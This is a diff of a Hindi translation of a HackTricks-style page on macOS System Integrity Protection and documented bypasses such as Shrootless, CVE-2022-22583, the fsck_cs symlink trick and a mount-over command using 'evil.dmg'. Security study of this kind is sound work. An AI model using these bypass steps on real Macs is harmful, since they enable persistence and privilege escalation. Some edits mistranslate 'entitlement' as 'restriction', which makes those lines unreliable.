-विकल्प nvram वेरिएबल में एक बिटफ्लैग के रूप में रखे जाते हैं (`csr-active-config` Intel पर और ARM के लिए बूटेड डिवाइस ट्री से `lp-sip0` पढ़ा जाता है)। आप फ्लैग्स को XNU सोर्स कोड में `csr.sh` में देख सकते हैं:
+विकल्प nvram वेरिएबल में एक बिटफ्लैग के रूप में रखे जाते हैं (`csr-active-config` Intel पर और `lp-sip0` ARM के लिए बूटेड डिवाइस ट्री से पढ़ा जाता है)। आप फ्लैग्स को XNU सोर्स कोड में `csr.sh` में देख सकते हैं:

 <figure><img src="../../../.gitbook/assets/image (720).png" alt=""><figcaption></figcaption></figure>

@ -65,7 +67,7 @@ drwxr-xr-x  338 root  wheel  restricted 10816 May 13 00:29 /usr/libexec
 ```bash
 csrutil status
 ```
-यदि आपको SIP अक्षम करना है, तो आपको अपने कंप्यूटर को रिकवरी मोड में पुनः आरंभ करना होगा (स्टार्टअप के दौरान Command+R दबाकर), फिर निम्नलिखित कमांड को निष्पादित करें:
+यदि आपको SIP अक्षम करने की आवश्यकता है, तो आपको अपने कंप्यूटर को रिकवरी मोड में पुनः आरंभ करना होगा (स्टार्टअप के दौरान Command+R दबाकर), फिर निम्नलिखित कमांड को निष्पादित करें:
 ```bash
 csrutil disable
 ```
@ -81,44 +83,44 @@ SIP कई अन्य प्रतिबंध भी लगाता है

 ## SIP Bypasses

-यदि कोई हमलावर SIP को बायपास करने में सफल होता है, तो वह यह कर सकता है:
+यदि कोई हमलावर SIP को बायपास करने में सफल होता है, तो वह यह कर सकेगा:

 * सभी उपयोगकर्ताओं के मेल, संदेश, Safari इतिहास... पढ़ें
-* वेबकैम, माइक्रोफोन या कुछ भी के लिए अनुमतियां प्रदान करें (SIP संरक्षित TCC डेटाबेस पर सीधे लिखकर) - TCC बायपास
-* Persistence: वह मैलवेयर को SIP संरक्षित स्थान पर सहेज सकता है और तब भी toot उसे हटा नहीं पाएगा। साथ ही वह MRT के साथ छेड़छाड़ कर सकता है।
-* Kernel extensions लोड करने की आसानी (इसके लिए अन्य कठोर सुरक्षा भी मौजूद हैं)।
+* वेबकैम, माइक्रोफोन या कुछ भी के लिए अनुमतियां प्रदान करें (SIP संरक्षित TCC डेटाबेस पर सीधे लिखकर) - TCC bypass
+* Persistence: वह मैलवेयर को SIP संरक्षित स्थान पर सहेज सकता है और toot भी इसे हटा नहीं पाएगा। साथ ही वह MRT के साथ छेड़छाड़ कर सकता है।
+* Kernel extensions लोड करने की सुविधा (इसके लिए अन्य कठोर सुरक्षा भी मौजूद हैं)।

 ### Installer Packages

-**Apple के प्रमाणपत्र के साथ हस्ताक्षरित Installer packages** इसकी सुरक्षा को बायपास कर सकते हैं। इसका मतलब है कि मानक डेवलपर्स द्वारा हस्ताक्षरित पैकेज भी अवरुद्ध हो जाएंगे यदि वे SIP-संरक्षित निर्देशिकाओं में संशोधन करने का प्रयास करते हैं।
+**Apple के प्रमाणपत्र के साथ हस्ताक्षरित Installer packages** इसकी सुरक्षा को बायपास कर सकते हैं। इसका मतलब है कि मानक डेवलपर्स द्वारा हस्ताक्षरित पैकेज भी ब्लॉक किए जाएंगे यदि वे SIP-संरक्षित निर्देशिकाओं में संशोधन करने का प्रयास करते हैं।

-### अनुपस्थित SIP फ़ाइल
+### Inexistent SIP file

 एक संभावित छेद यह है कि यदि कोई फ़ाइल **`rootless.conf` में निर्दिष्ट है लेकिन वर्तमान में मौजूद नहीं है**, तो इसे बनाया जा सकता है। मैलवेयर इसका फायदा उठाकर सिस्टम पर **persistence स्थापित** कर सकता है। उदाहरण के लिए, एक दुर्भावनापूर्ण प्रोग्राम `/System/Library/LaunchDaemons` में एक .plist फ़ाइल बना सकता है यदि यह `rootless.conf` में सूचीबद्ध है लेकिन मौजूद नहीं है।

 ### com.apple.rootless.install.heritable

 {% hint style="danger" %}
-प्रमाणपत्र **`com.apple.rootless.install.heritable`** SIP को बायपास करने की अनुमति देता है
+प्रतिबंध **`com.apple.rootless.install.heritable`** SIP को बायपास करने की अनुमति देता है
 {% endhint %}

 #### Shrootless

-[**इस ब्लॉग पोस्ट के शोधकर्ताओं ने**](https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/) macOS के System Integrity Protection (SIP) तंत्र में एक कमजोरी की खोज की, जिसे 'Shrootless' कमजोरी कहा जाता है। यह कमजोरी **`system_installd`** डेमॉन के आसपास केंद्रित है, जिसमें एक प्रमाणपत्र, **`com.apple.rootless.install.heritable`**, होता है, जो इसके चाइल्ड प्रोसेसेस को SIP की फाइल सिस्टम प्रतिबंधों को बायपास करने की अनुमति देता है।
+[**इस ब्लॉग पोस्ट के शोधकर्ताओं ने**](https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/) macOS के System Integrity Protection (SIP) तंत्र में एक कमजोरी की खोज की, जिसे 'Shrootless' कमजोरी कहा गया। यह कमजोरी **`system_installd`** डेमॉन के आसपास केंद्रित है, जिसमें एक प्रतिबंध, **`com.apple.rootless.install.heritable`**, होता है जो इसके चाइल्ड प्रोसेसेस को SIP के फाइल सिस्टम प्रतिबंधों को बायपास करने की अनुमति देता है।

 **`system_installd`** डेमॉन **Apple** द्वारा हस्ताक्षरित पैकेजों को इंस्टॉल करेगा।

-शोधकर्ताओं ने पाया कि Apple-हस्ताक्षरित पैकेज (.pkg फ़ाइल) की स्थापना के दौरान, **`system_installd`** पैकेज में शामिल किसी भी **post-install** स्क्रिप्ट को **चलाता है**। ये स्क्रिप्ट डिफ़ॉल्ट शेल, **`zsh`** द्वारा निष्पादित की जाती हैं, जो गैर-इंटरैक्टिव मोड में भी, यदि **`/etc/zshenv`** फ़ाइल मौजूद है, तो उससे स्वचालित रूप से **चलाता है**। इस व्यवहार का हमलावरों द्वारा शोषण किया जा सकता है: एक दुर्भावनापूर्ण `/etc/zshenv` फ़ाइल बनाकर और **`system_installd` के `zsh` को आमंत्रित करने का इंतजार करके**, वे डिवाइस पर मनमाने ऑपरेशन कर सकते हैं।
+शोधकर्ताओं ने पाया कि Apple-हस्ताक्षरित पैकेज (.pkg फ़ाइल) की स्थापना के दौरान, **`system_installd`** पैकेज में शामिल किसी भी **post-install** स्क्रिप्ट को **चलाता है**। ये स्क्रिप्ट डिफ़ॉल्ट शेल, **`zsh`** द्वारा निष्पादित की जाती हैं, जो गैर-इंटरैक्टिव मोड में भी, यदि **`/etc/zshenv`** फ़ाइल मौजूद है, तो इससे स्वचालित रूप से **चलाता है**। इस व्यवहार का हमलावरों द्वारा शोषण किया जा सकता है: एक दुर्भावनापूर्ण `/etc/zshenv` फ़ाइल बनाकर और **`system_installd` के `zsh` को आमंत्रित करने का इंतजार करके**, वे डिवाइस पर मनमाने ऑपरेशन कर सकते हैं।

-इसके अलावा, यह पता चला कि **`/etc/zshenv` का उपयोग एक सामान्य हमला तकनीक के रूप में किया जा सकता है**, केवल SIP बायपास के लिए नहीं। प्रत्येक उपयोगकर्ता प्रोफ़ाइल में एक `~/.zshenv` फ़ाइल होती है, जो `/etc/zshenv` की तरह ही व्यवहार करती है लेकिन इसके लिए रूट अनुमतियां की आवश्यकता नहीं होती। यह फ़ाइल प्रत्येक बार `zsh` शुरू होने पर एक persistence तंत्र के रूप में उपयोग की जा सकती है, या एक विशेषाधिकार वृद्धि तंत्र के रूप में। यदि एक व्यवस्थापक उपयोगकर्ता `sudo -s` या `sudo <command>` का उपयोग करके रूट में उन्नत होता है, तो `~/.zshenv` फ़ाइल ट्रिगर हो जाएगी, प्रभावी रूप से रूट में उन्नत हो जाएगी।
+इसके अलावा, यह पता चला कि **`/etc/zshenv` का उपयोग एक सामान्य हमला तकनीक के रूप में किया जा सकता है**, केवल SIP बायपास के लिए नहीं। प्रत्येक उपयोगकर्ता प्रोफ़ाइल में एक `~/.zshenv` फ़ाइल होती है, जो `/etc/zshenv` की तरह ही व्यवहार करती है लेकिन इसके लिए रूट अनुमतियां की आवश्यकता नहीं होती। यह फ़ाइल `zsh` शुरू होने पर हर बार ट्रिगर होने वाले पर्सिस्टेंस मैकेनिज़्म के रूप में उपयोग की जा सकती है, या एक प्रिविलेज एलिवेशन मैकेनिज़्म के रूप में। यदि एक एडमिन उपयोगकर्ता `sudo -s` या `sudo <command>` का उपयोग करके रूट में एलिवेट करता है, तो `~/.zshenv` फ़ाइल ट्रिगर हो जाएगी, प्रभावी रूप से रूट में एलिवेट हो जाएगी।

 #### [**CVE-2022-22583**](https://perception-point.io/blog/technical-analysis-cve-2022-22583/)

-[**CVE-2022-22583**](https://perception-point.io/blog/technical-analysis-cve-2022-22583/) में यह पता चला कि वही **`system_installd`** प्रक्रिया अभी भी शोषित की जा सकती है क्योंकि यह **post-install स्क्रिप्ट को `/tmp` के अंदर SIP द्वारा संरक्षित एक यादृच्छिक नामित फ़ोल्डर के अंदर रख रही थी**। बात यह है कि **`/tmp` स्वयं SIP द्वारा संरक्षित नहीं है**, इसलिए यह संभव था कि **वर्चुअल इमेज को उस पर माउंट किया जाए**, फिर **installer** वहां पर **post-install स्क्रिप्ट** डालेगा, **वर्चुअल इमेज को अनमाउंट करेगा**, सभी **फ़ोल्डर्स को पुनः बनाएगा** और **post installation** स्क्रिप्ट को **payload** के साथ जोड़ देगा जिसे निष्पादित किया जाना है।
+[**CVE-2022-22583**](https://perception-point.io/blog/technical-analysis-cve-2022-22583/) में यह पता चला कि वही **`system_installd`** प्रक्रिया अभी भी दुरुपयोग की जा सकती है क्योंकि यह **post-install script को `/tmp` के अंदर SIP द्वारा संरक्षित एक यादृच्छिक नाम वाले फ़ोल्डर के अंदर रख रही थी**। बात यह है कि **`/tmp` खुद SIP द्वारा संरक्षित नहीं है**, इसलिए यह संभव था कि **वर्चुअल इमेज को इस पर माउंट** किया जाए, फिर **installer** वहां पर **post-install script** डालेगा, **वर्चुअल इमेज को अनमाउंट** करेगा, सभी **फ़ोल्डर्स को पुनः बनाएगा** और **post installation** स्क्रिप्ट को **payload** के साथ जोड़ देगा जिसे निष्पादित किया जाना है।

 #### [fsck\_cs utility](https://www.theregister.com/2016/03/30/apple_os_x_rootless/)

-इस बायपास ने यह तथ्य का फायदा उठाया कि **`fsck_cs`** **symbolic links** का पालन करेगा और उसे प्रस्तुत किए गए फाइलसिस्टम को ठीक करने का प्रयास करेगा।
+बायपास ने इस तथ्य का शोषण किया कि **`fsck_cs`** **symbolic links** का अनुसरण करेगा और उसे प्रस्तुत किए गए फाइलसिस्टम को ठीक करने का प्रयास करेगा।

 इसलिए, एक हमलावर _`/dev/diskX`_ से `/System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist` की ओर एक symbolic link बना सकता है और पूर्व पर **`fsck_cs`** को आमंत्रित कर सकता है। जैसे ही `Info.plist` फ़ाइल भ्रष्ट हो जाती है, ऑपरेटिंग सिस्टम अब **kernel extension exclusions को नियंत्रित नहीं कर पाएगा**, इस प्रकार SIP को बायपास कर देगा।

@ -131,11 +133,11 @@ reboot
 ```
 {% endcode %}

-उपरोक्त Info.plist फ़ाइल, जो अब नष्ट हो चुकी है, का उपयोग **SIP द्वारा कुछ कर्नेल एक्सटेंशन्स को व्हाइटलिस्ट करने** और विशेष रूप से **अन्यों को लोड होने से रोकने** के लिए किया जाता है। यह सामान्यतः Apple के अपने कर्नेल एक्सटेंशन **`AppleHWAccess.kext`** को ब्लैकलिस्ट करता है, लेकिन कॉन्फ़िगरेशन फ़ाइल के नष्ट हो जाने के बाद, हम इसे लोड कर सकते हैं और सिस्टम RAM में जैसे चाहें पढ़ने और लिखने के लिए इसका उपयोग कर सकते हैं।
+उपरोक्त Info.plist फ़ाइल, जो अब नष्ट हो चुकी है, **SIP द्वारा कुछ कर्नेल एक्सटेंशन्स को व्हाइटलिस्ट करने** और विशेष रूप से **अन्यों को लोड होने से रोकने** के लिए प्रयोग की जाती है। यह सामान्यतः Apple के अपने कर्नेल एक्सटेंशन **`AppleHWAccess.kext`** को ब्लैकलिस्ट करती है, परंतु कॉन्फ़िगरेशन फ़ाइल के नष्ट हो जाने के बाद, हम इसे लोड कर सकते हैं और सिस्टम RAM में जैसे चाहें पढ़ने और लिखने के लिए इसका उपयोग कर सकते हैं।

 #### [SIP संरक्षित फ़ोल्डर्स पर माउंट करना](https://www.slideshare.net/i0n1c/syscan360-stefan-esser-os-x-el-capitan-sinking-the-ship)

-**SIP संरक्षित फ़ोल्डर्स पर एक नई फ़ाइल सिस्टम को माउंट करना संभव था ताकि सुरक्षा को बायपास किया जा सके**।
+**SIP संरक्षित फ़ोल्डर्स पर नई फ़ाइल सिस्टम को माउंट करके सुरक्षा को बायपास करना** संभव था।
 ```bash
 mkdir evil
 # Add contento to the folder
@ -144,9 +146,9 @@ hdiutil attach -mountpoint /System/Library/Snadbox/ evil.dmg
 ```
 #### [अपग्रेडर बायपास (2016)](https://objective-see.org/blog/blog\_0x14.html)

-जब निष्पादित किया जाता है, तो अपग्रेड/इंस्टॉलर एप्लिकेशन (उदाहरण के लिए `Install macOS Sierra.app`) सिस्टम को एक इंस्टॉलर डिस्क इमेज से बूट करने के लिए सेटअप करता है (जो कि डाउनलोड किए गए एप्लिकेशन के भीतर एम्बेडेड होता है)। यह इंस्टॉलर डिस्क इमेज ओएस को अपग्रेड करने की तर्क संग्रहित करता है, उदाहरण के लिए OS X El Capitan से macOS Sierra तक।
+जब निष्पादित किया जाता है, तो अपग्रेड/इंस्टॉलर एप्लिकेशन (उदाहरण के लिए `Install macOS Sierra.app`) सिस्टम को एक इंस्टॉलर डिस्क इमेज से बूट करने के लिए सेटअप करता है (जो डाउनलोड किए गए एप्लिकेशन के भीतर एम्बेडेड होता है)। यह इंस्टॉलर डिस्क इमेज OS को अपग्रेड करने के लॉजिक को समाहित करता है, उदाहरण के लिए OS X El Capitan से macOS Sierra तक।

-सिस्टम को अपग्रेड/इंस्टॉलर इमेज (`InstallESD.dmg`) से बूट करने के लिए, `Install macOS Sierra.app` **`bless`** उपयोगिता का उपयोग करता है (जो अधिकार `com.apple.rootless.install.heritable` को विरासत में प्राप्त करता है):
+अपग्रेड/इंस्टॉलर इमेज (`InstallESD.dmg`) से सिस्टम को बूट करने के लिए, `Install macOS Sierra.app` **`bless`** उपयोगिता का उपयोग करता है (जो एंटाइटलमेंट `com.apple.rootless.install.heritable` को विरासत में प्राप्त करता है):

 {% code overflow="wrap" %}
 ```bash
@ -156,16 +158,16 @@ hdiutil attach -mountpoint /System/Library/Snadbox/ evil.dmg

 इसलिए, यदि एक हमलावर अपग्रेड इमेज (`InstallESD.dmg`) को सिस्टम बूट होने से पहले मॉडिफाई कर सकता है, तो वह SIP को बायपास कर सकता है।

-इमेज को मॉडिफाई करने का तरीका यह था कि एक डायनामिक लोडर (dyld) को बदल दिया जाए जो नासमझी से मैलिशियस dylib को लोड और एक्जीक्यूट करेगा एप्लिकेशन के संदर्भ में। जैसे **`libBaseIA`** dylib। इसलिए, जब भी इंस्टॉलर एप्लिकेशन को उपयोगकर्ता द्वारा शुरू किया जाता है (अर्थात् सिस्टम को अपग्रेड करने के लिए) हमारा मैलिशियस dylib (जिसका नाम libBaseIA.dylib है) भी इंस्टॉलर में लोड और एक्जीक्यूट होगा।
+इमेज को मॉडिफाई करने का तरीका यह था कि एक डायनामिक लोडर (dyld) को बदल दिया जाए जो नासमझी से मैलिशस dylib को लोड और एक्जीक्यूट करेगा, जैसे कि **`libBaseIA`** dylib। इसलिए, जब भी इंस्टॉलर एप्लिकेशन को उपयोगकर्ता द्वारा शुरू किया जाता है (अर्थात् सिस्टम को अपग्रेड करने के लिए) हमारा मैलिशस dylib (जिसका नाम libBaseIA.dylib है) भी इंस्टॉलर में लोड और एक्जीक्यूट होगा।

-अब 'अंदर' इंस्टॉलर एप्लिकेशन में, हम अपग्रेड प्रक्रिया के इस चरण को नियंत्रित कर सकते हैं। चूंकि इंस्टॉलर इमेज को 'ब्लेस' करेगा, हमें बस इतना करना है कि इमेज, **`InstallESD.dmg`**, को इस्तेमाल होने से पहले सबवर्ट कर दें। यह **`extractBootBits`** मेथड को मेथड स्विजलिंग के साथ हुक करके संभव था।\
-मैलिशियस कोड को डिस्क इमेज के इस्तेमाल होने से ठीक पहले एक्जीक्यूट करने के बाद, इसे इन्फेक्ट करने का समय है।
+अब 'अंदर' इंस्टॉलर एप्लिकेशन में, हम अपग्रेड प्रक्रिया के इस चरण को नियंत्रित कर सकते हैं। चूंकि इंस्टॉलर इमेज को 'ब्लेस' करेगा, हमें बस इतना करना है कि इसका उपयोग होने से पहले इमेज, **`InstallESD.dmg`**, को सबवर्ट कर दें। यह **`extractBootBits`** मेथड को मेथड स्विजलिंग के साथ हुक करके संभव था।\
+मैलिशस कोड को डिस्क इमेज के उपयोग से ठीक पहले एक्जीक्यूट करने के बाद, इसे इन्फेक्ट करने का समय है।

-`InstallESD.dmg` के अंदर एक और एम्बेडेड डिस्क इमेज `BaseSystem.dmg` है जो अपग्रेड कोड की 'रूट फाइल-सिस्टम' है। इसमें एक डायनामिक लाइब्रेरी को इंजेक्ट करना संभव था ताकि मैलिशियस कोड OS-लेवल फाइलों को मॉडिफाई करने में सक्षम प्रोसेस के संदर्भ में चल रहा हो।
+`InstallESD.dmg` के अंदर एक और एम्बेडेड डिस्क इमेज `BaseSystem.dmg` है जो अपग्रेड कोड की 'रूट फाइल-सिस्टम' है। यह संभव था कि `BaseSystem.dmg` में एक डायनामिक लाइब्रेरी इंजेक्ट की जाए ताकि मैलिशस कोड OS-लेवल फाइलों को मॉडिफाई करने में सक्षम प्रोसेस के संदर्भ में चल रहा हो।

 #### [systemmigrationd (2023)](https://www.youtube.com/watch?v=zxZesAN-TEk)

-[**DEF CON 31**](https://www.youtube.com/watch?v=zxZesAN-TEk) में इस टॉक में दिखाया गया है कि कैसे **`systemmigrationd`** (जो SIP को बायपास कर सकता है) एक **bash** और एक **perl** स्क्रिप्ट को एक्जीक्यूट करता है, जिसे env वेरिएबल्स **`BASH_ENV`** और **`PERL5OPT`** के माध्यम से दुरुपयोग किया जा सकता है।
+[**DEF CON 31**](https://www.youtube.com/watch?v=zxZesAN-TEk) से इस टॉक में दिखाया गया है कि कैसे **`systemmigrationd`** (जो SIP को बायपास कर सकता है) एक **bash** और एक **perl** स्क्रिप्ट को एक्जीक्यूट करता है, जिसे env वेरिएबल्स **`BASH_ENV`** और **`PERL5OPT`** के माध्यम से दुरुपयोग किया जा सकता है।

 ### **com.apple.rootless.install**

@ -173,17 +175,17 @@ hdiutil attach -mountpoint /System/Library/Snadbox/ evil.dmg
 एंटाइटलमेंट **`com.apple.rootless.install`** SIP को बायपास करने की अनुमति देता है
 {% endhint %}

-[**CVE-2022-26712**](https://jhftss.github.io/CVE-2022-26712-The-POC-For-SIP-Bypass-Is-Even-Tweetable/) से पता चलता है कि सिस्टम XPC सर्विस `/System/Library/PrivateFrameworks/ShoveService.framework/Versions/A/XPCServices/SystemShoveService.xpc` में एंटाइटलमेंट **`com.apple.rootless.install`** है, जो प्रोसेस को SIP प्रतिबंधों को बायपास करने की अनुमति देता है। यह **किसी भी सुरक्षा जांच के बिना फाइलों को मूव करने का एक तरीका भी प्रदर्शित करता है।**
+[**CVE-2022-26712**](https://jhftss.github.io/CVE-2022-26712-The-POC-For-SIP-Bypass-Is-Even-Tweetable/) से, सिस्टम XPC सर्विस `/System/Library/PrivateFrameworks/ShoveService.framework/Versions/A/XPCServices/SystemShoveService.xpc` में एंटाइटलमेंट **`com.apple.rootless.install`** है, जो प्रोसेस को SIP प्रतिबंधों को बायपास करने की अनुमति देता है। यह **किसी भी सुरक्षा जांच के बिना फाइलों को मूव करने का एक तरीका भी प्रदर्शित करता है।**

 ## Sealed System Snapshots

-Sealed System Snapshots एक फीचर है जिसे Apple ने **macOS Big Sur (macOS 11)** में पेश किया था, जो **System Integrity Protection (SIP)** मैकेनिज्म का हिस्सा है ताकि अतिरिक्त सुरक्षा और सिस्टम स्थिरता प्रदान की जा सके। ये मूल रूप से सिस्टम वॉल्यूम के रीड-ओनली संस्करण हैं।
+Sealed System Snapshots एक फीचर है जिसे Apple ने **macOS Big Sur (macOS 11)** में पेश किया था, जो अतिरिक्त सुरक्षा और सिस्टम स्थिरता प्रदान करने के लिए **System Integrity Protection (SIP)** तंत्र का हिस्सा है। ये मूल रूप से सिस्टम वॉल्यूम के रीड-ओनली संस्करण हैं।

 यहाँ एक विस्तृत नज़र है:

-1. **Immutable System**: Sealed System Snapshots macOS सिस्टम वॉल्यूम को "immutable" बनाते हैं, अर्थात् इसे मॉडिफाई नहीं किया जा सकता। यह सिस्टम में किसी भी अनधिकृत या आकस्मिक परिवर्तनों को रोकता है जो सुरक्षा या सिस्टम स्थिरता को समझौता कर सकते हैं।
+1. **Immutable System**: Sealed System Snapshots macOS सिस्टम वॉल्यूम को "immutable" बनाते हैं, यानी कि इसे मॉडिफाई नहीं किया जा सकता। यह सिस्टम में किसी भी अनधिकृत या आकस्मिक परिवर्तनों को रोकता है जो सुरक्षा या सिस्टम स्थिरता को समझौता कर सकते हैं।
 2. **System Software Updates**: जब आप macOS अपडेट्स या अपग्रेड्स इंस्टॉल करते हैं, macOS एक नया सिस्टम स्नैपशॉट बनाता है। macOS स्टार्टअप वॉल्यूम फिर **APFS (Apple File System)** का उपयोग करके इस नए स्नैपशॉट पर स्विच करता है। अपडेट्स लागू करने की पूरी प्रक्रिया सुरक्षित और अधिक विश्वसनीय हो जाती है क्योंकि सिस्टम हमेशा अपडेट के दौरान कुछ गलत होने पर पिछले स्नैपशॉट पर वापस जा सकता है।
-3. **Data Separation**: macOS Catalina में पेश किए गए डेटा और सिस्टम वॉल्यूम अलगाव की अवधारणा के साथ, Sealed System Snapshot फीचर सुनिश्चित करता है कि आपका सारा डेटा और सेटिंग्स एक अलग "**Data**" वॉल्यूम पर संग्रहीत होते हैं। यह अलगाव आपके डेटा को सिस्टम से स्वतंत्र बनाता है, जो सिस्टम अपडेट्स की प्रक्रिया को सरल बनाता है और सिस्टम सुरक्षा को बढ़ाता है।
+3. **Data Separation**: macOS Catalina में पेश किए गए डेटा और सिस्टम वॉल्यूम सेपरेशन की अवधारणा के साथ, Sealed System Snapshot फीचर सुनिश्चित करता है कि आपका सारा डेटा और सेटिंग्स एक अलग "**Data**" वॉल्यूम पर संग्रहीत होते हैं। यह अलगाव आपके डेटा को सिस्टम से स्वतंत्र बनाता है, जो सिस्टम अपडेट्स की प्रक्रिया को सरल बनाता है और सिस्टम सुरक्षा को बढ़ाता है।

 याद रखें कि ये स्नैपशॉट्स macOS द्वारा स्वचालित रूप से प्रबंधित किए जाते हैं और APFS की स्पेस शेयरिंग क्षमताओं के कारण आपकी डिस्क पर अतिरिक्त स्थान नहीं लेते हैं। यह भी महत्वपूर्ण है कि ये स्नैपशॉट्स **Time Machine स्नैपशॉट्स** से अलग हैं, जो पूरे सिस्टम के यूजर-एक्सेसिबल बैकअप्स हैं।

@ -230,26 +232,28 @@ Sealed System Snapshots एक फीचर है जिसे Apple ने **m

 पिछले आउटपुट में यह संभव है कि **यूजर-एक्सेसिबल लोकेशन्स** `/System/Volumes/Data` के तहत माउंट किए गए हैं।

-इसके अलावा, **macOS सिस्टम वॉल्यूम स्नैपशॉट** `/` में माउंट किया गया है और यह **sealed** है (OS द्वारा क्रिप्टोग्राफिकली साइन किया गया है)। इसलिए, अगर SIP बायपास हो जाता है और इसे मॉडिफाई करता है, तो **OS अब बूट नहीं होगा**।
+इसके अलावा, **macOS सिस्टम वॉल्यूम स्नैपशॉट** `/` में माउंट किया गया है और यह **सील्ड** है (OS द्वारा क्रिप्टोग्राफिकली साइन किया गया)। इसलिए, अगर SIP बायपास हो जाता है और इसे मॉडिफाई करता है, तो **OS अब बूट नहीं होगा**।

 यह भी संभव है कि **सील सक्षम है यह वेरिफाई करने के लिए** चलाएं:
 ```bash
 csrutil authenticated-root status
 Authenticated Root status: enabled
 ```
-इसके अलावा, स्नैपशॉट डिस्क को **केवल-पढ़ने के लिए** माउंट किया गया है:
+इसके अलावा, स्नैपशॉट डिस्क को **read-only** के रूप में भी माउंट किया जाता है:
 ```
 mount
 /dev/disk3s1s1 on / (apfs, sealed, local, read-only, journaled)
 ```
 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>

-* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
-* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* **जुड़ें** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) या [**telegram group**](https://t.me/peass) से या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-* **अपनी हैकिंग ट्रिक्स साझा करें, hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PRs सबमिट करके.**
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
+* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।

 </details>